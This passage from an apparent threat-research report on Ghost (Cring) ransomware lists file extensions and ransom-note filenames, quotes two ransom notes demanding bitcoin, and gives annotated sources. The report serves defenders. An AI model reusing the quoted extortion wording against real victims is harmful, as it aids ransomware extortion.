- .rsaes <- note that this likely (and cheekily) refers to the RSA + AES algorithms used in encryption
- .ryuks
- .lldc
- .locked
- .sg-Geister
Totally Unverified and Unverifiable (and unassociated with anything verifiable):
- .4nMaJj
Ransom Notes:
- !!!!WrReadMe!!!.rtf
Source: Kaspersky Cring Analysis Report (April 2021)
- !!!!deReadMe!!!.txt
"Sorry, your network is encrypted, and encryption is achieved through RSA-8192, which means that the decryption service can only be provided by us. You cannot decrypt data through a security company. They will only contact us to pay the fee. We recommend that you pay 2 bitcoins directly to us , Or send two files to confirm whether we can decrypt, you need to deal with it as soon as possible, because the key file necessary for decryption will not be kept. Contact: [email protected] [email protected]"
Source: HowToFix Guide on "The RSA/Cring Virus" (February 2021)
- Unknown Name
"Oops, your computer is encrypted. You need to pay 2 bitcoins to decrypt the files you need. If you dont reply within three days, you wont be able to get the decryption service. Contact: qkhooks0708 @protonmail.com"
Source: Heuristics text match in a Hybrid Analysis report for Cring.exe (MD5: c5d712f82d5d37bb284acd4468ab3533) (2021)
- deReadMe!!!.txt
Source: Sensors Tech Forum - Removing the Cring Ransomware (January 2023)
- !!!deReadMe!!!.rtf
Source: Japanese Trend Micro Report on Cring
- deReadME!!! "Notepad" (This is the oldest attack I could find from Ghost, traced back to December 9, 2020!)
Source: Three different articles to the same post on December 9th, 2020, 12:49:07:
- https://www.webptt.com/cn.aspx?n=bbs/AntiVirus/M.1607489351.A.6BE.html
- http://www.ucptt.com/article/AntiVirus/1607489351/6BE (Note: UCPTT does not support a secure HTTPS connection)
- HOW_TO_GET_FILES_BACK.txt
Source: BleepingComputer Forums (March 2021)
- HOW_CAN_GET_FILES_BACK.txt and HOW_CAN_GET_FILES_BACK.rtf
Sources:
- PCRisk Ghost Ransomware Overview and Removal Guide (December 2023)
- BleepingComputer Forums (March 2021)
Another without a screenshot:
- HOW_CAN_RECOVERY.txt (it was attached in a BleepingComputer forum, but I could not get the access link to work)
REFERENCES
- "#StopRansomware: Ghost (Cring) Ransomware (PDF)" - FBI, CISA, and MS-ISAC Joint Advisory (2025, February 19)
- "#StopRansomware: Ghost (Cring) Ransomware (Website)" - CISA (2025, February 19)
- "ランサムウェア「Cring」の被害が国内で拡大、VPN脆弱性を狙い侵入" // "Ransomware 'Cring' spread in the country, intruding for VPN vulnerability" (Translation by Reverso Context) - (Japanese) Trend Micro (2021, May 20)
- "Ghost Ransomware: Striking Before You Even Know It’s There" - Vectra (2025, February 26)
- "Ghost ransomware virus - removal and decryption options" - PCrisk (2023, December 8)
- "Ransomware-Liste inkl. Decryptor (zum Entschlüsseln)" (German) (2024)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Cring Hand-Ransomware, Crypt3r Ransomware, Variants: CRING, RSA, Vjiszy1lo, Ghost, Phantom, VnBeHa99y, Pay4it" - (Russian) Amigo-A (2021, January 14)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Parasite Ransomware, Aliases: SharpCrypter, Paralock" - (Russian) Amigo-A (2021, January 4)
- "Ransomware Research - Cring" - elastio (n.d.)
- "Ransomware Research - Parasite" elastio (n.d.)
- "2022 年 6 月勒索病毒态势分析" - (Chinese) ioc.one (???) <- If you can find out more from this source, please let me know!
- "国家互联网应急中心(CNCERT/CC) - 勒索软件动态周报" - (Chinese Intelligence Report on Ransomware) (2022, June) <- Translated and summarized with GPT-4o via duck.ai, and with Reverso Context
- "Sectrio Malware Report" (2022) <- Only used in a rabbit hole I went down to see whether or not I could trust a different source that provided potential emails used by Ghost (like starmoon@my[.]com, bleepbloopbop@protonmail[.]com, and r3wuq@tuta[.]io). I found that I couldn't and these emails are likely not related to Ghost.
- "Unpatched vulnerable VPN servers hit by Cring ransomware" (2021, April 8)
  - References this insightful Kaspersky report: "Vulnerability in FortiGate VPN servers is exploited in Cring ransomware attacks" (2021, April 7)
- "T1055 Process Injection" - MITRE ATT&CK (2023, March 30)
- "Services on NBU Clients" - Veritas (2011)
- "A new #Cring #Ransomware" - Amigo-A on Twitter/X (2021, January 21)
- "!!!!deReadMe!!!.txt" - Pastebin from Demonslay335 (one of the researchers related to the BleepingComputer forums that initially investigated Cring) (2021, January 26)
- "What Are Malicious Newly Registered Domains?" - Palo Alto Networks (n.d.) <- Used, alongside AI, to determine what the advantages and drawbacks of a ransomware gang registering and hardcoding a domain versus an IP address are.
- "CISA and FBI Report Ghost Ransomware Breached 70 Countries" (2025, February 21)
- "FBI warns a cyber attack under way and you should back up your data" (2025, February 21)
- "FBI Says Backup Now - Advisory Warns Of Dangerous Ransomware Attacks" (2025, February 22)
- "Warning issued over prolific 'Ghost' ransomware group" (2025, February 24)
- "Cring Ransomware" - England National Health Service (2021, April 13) <- This initially led to a huge pivot off of the "Vjiszy1lo" name/alias associated with Ghost. Presumably the federal government will have done their due diligence and verified this information.
- "New Cring ransomware hits unpatched Fortinet VPN devices" (2021, April 7)
- "Cring ransomware group exploits ancient ColdFusion server" (2021, September 21)
- "Shadow-Pulse/Ransomlist.csv" (List of ransomware gangs, aliases, algorithms, etc.) <- Note that, despite the rich information, I cannot verify any of the information in this resource as-is.
- "Common TTPs of modern ransomware groups" - Kaspersky via Wayback Machine (2022) <- The only information utilized in this report was the graph that stated that Cring emerged in December 2020.
- "RSA Virus Files of Ransomware - How to remove Cring virus?" (2021, February 17) <- Do not download any tools from this article.
- "Remove Cring Ransomware" (2023, January 3) <- Do not download any tools from this article.
- "How to remove Cring Ransomware and decrypt .cring" (2021, February 17) <- ABSOLUTELY do not download any tools from this article. One of the first links is to Afflat3b2.com, a known distributor of malware and PUPs. (Article with more information on Afflat3b2)
- "xtaci/smux" (Stream Multiplexing Library for golang) <- Linked in analysis of cring.exe on Hybrid Analysis
- Ransomware time-to-ransom and monetary statistics:
  - "2025 Cyber Threat Report" - Huntress (2025, February 5) <- Note that the data for this report is from 2024.
    - Linked from this article: "Dwell Time Reduced Further as Attacker Infect in Four Hours" (2025, February 17)
  - "Ransomware Dwell Time Hits Low Of 24 Hours" - Secureworks/Sophos (2023, October 5)
  - "Roundup: The top ransomware stories of 2024"
- Other Parasite/Paras1te-specific sources (used to determine links and distinctions between Ghost and Parasite):
  - "Parasite ransomware targeting French users actively spreading in the wild" (2021, February 26)
  - "Parasite Ransomware (.arazite)" (2021, May 3)
  - "How to remove Paras1te ransomware from the infected machine" - PCrisk (2021, November 7)
  - "Paras1te Ransomware" (2021, February 10)
- BleepingComputer Forums:
  - "Crypt3r (Cringe/Ghost/Cring) Ransomware (.cring, .phantom) Support Topic" (2021, January 19)
  - "Ransomware infected, File extension .Pay4IT" (2021, April 10)
  - "ransomware Cring Hand - Crypt3r" (2021, October 24)
  - "MS17-010 - ETERNALBLUE - Exploit" (2020, January 22)
  - ".vjiszy1lo extension, no ransom note." (2021, March 4)